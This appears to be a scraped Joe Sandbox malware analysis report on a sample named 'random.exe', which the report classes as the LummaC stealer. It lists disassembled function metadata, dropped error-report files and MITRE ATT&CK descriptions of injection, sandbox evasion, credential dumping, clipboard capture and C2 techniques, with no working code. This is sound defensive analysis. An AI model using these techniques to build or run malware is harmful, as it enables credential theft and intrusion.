Function 0041F3E0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 65b04920acd8ec40befbc16cdab85cd19ddd64fc0dfac740f80379ed40623b4a
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 7CD0A7715487B50E57588D3C44A04BBFBE8E987712B1814AFE8D6E3206D225DC47469D

Function 00425560 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042561D

Strings

p:#, xrefs: 00425647
MO, xrefs: 00425572
$%, xrefs: 004255A6

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: $%$p:#$MO
API String ID: 237503144-3521940197
Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction ID: 81944db62257c61826c9772faf3d9c506449667b4075365b7c5b7f4bc0eeec7d
Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction Fuzzy Hash: 6141DF365183448FE310CF24C88475FBBE2FFC5758F16892CE4D49B680D6B9CA0A8B86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_random.exe_ca1f07f5125e6bc91f62c19534af66d94f4128a_f759ac22_e704cede-f9d8-47b8-bdcb-ab76450523ff\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1D7.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2E2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD322.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
random.exe

Function 03087F19 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 03088096 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 02E629D7 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Function 02E60668 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 0043D0D0 Relevance: 32.5, APIs: 11, Strings: 7, Instructions: 957
memorycomCOMMON

Function 0040E16E Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 345
COMMON

Function 00421B30 Relevance: 9.3, Strings: 7, Instructions: 527
COMMON

Function 00408A60 Relevance: 7.7, APIs: 5, Instructions: 216
threadCOMMON

Function 0042F716 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 366
COMMON

Function 0042FB7D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327
COMMON

Function 0040C080 Relevance: 6.4, Strings: 5, Instructions: 104
COMMON

Function 00425713 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 346
COMMON

Function 00437C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181
COMMON

Function 00418BA2 Relevance: 5.4, Strings: 4, Instructions: 367
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre